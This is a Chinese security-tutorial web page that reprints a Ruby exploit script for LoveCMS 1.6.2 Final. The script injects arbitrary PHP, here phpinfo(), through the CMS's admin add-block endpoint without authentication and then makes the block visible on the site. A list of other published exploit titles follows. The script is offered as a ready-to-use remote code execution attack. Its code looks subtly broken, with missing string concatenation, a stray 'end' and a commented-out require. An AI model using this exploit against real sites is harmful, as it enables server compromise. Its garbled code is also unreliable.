手机
当前位置:查字典教程网 >网络安全 >Exploit >LoveCMS 1.6.2 Final Remote Code Execution Exploit
LoveCMS 1.6.2 Final Remote Code Execution Exploit
摘要:#!/usr/bin/ruby###ExploitbyPoMdaPiMp!##---------------------##pomdapim...

#!/usr/bin/ruby

#

## Exploit by PoMdaPiMp!

## ---------------------

## pomdapimp(at)gmail(dotcom)

##

## LoveCMS Exploit Series

## Episode 1: adding a side block

##

## Description: add some php into a block container

## on the side of the site. phpinfo() is called.

##

## Usage: ./LoveCMS_1_blocks.rb <host>

## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/

##

## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)

# require 'net/http'

require 'uri' @host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/' @host = ARGV[0] if ARGV[0]

@host = @host[-1, 1].to_s != '/' ? '/' : '' if @host

# --

puts " LoveCMS Exploit Series. #1: Adding side blocks."

puts

puts " : Attacking host: " @host # --

# Insert a new block

res = Net::HTTP.post_form(URI.parse(@host 'system/admin/addblock.php'),

{'submit'=>'1', 'title'=>'H4Ck', 'content' => 'phpinfo();', 'type' => 'php'})

puts " :: Block inserted." # --

# Build post variable for next step

post_vars = {'submit' => 1}

(1..50).each do |id|

post_vars['position' id.to_s] = 1

post_vars['height' id.to_s] = 1

post_vars['visible' id.to_s] = 1

end

# Make the block visible

res = Net::HTTP.post_form(URI.parse('http://127.0.0.1/lovecms_1.6.2_final/lovecms/system/admin/blocks.php'), post_vars )

puts " :: Blocks displayed." # --

puts

puts " - Visit " @host

end

【LoveCMS 1.6.2 Final Remote Code Execution Exploit】相关文章:

minb 0.1.0 Remote Code Execution Exploit

MS Windows (MessageBox) Memory Corruption Local Denial of Service

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

TGS CMS 0.3.2r2 Remote Code Execution Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

精品推荐
分类导航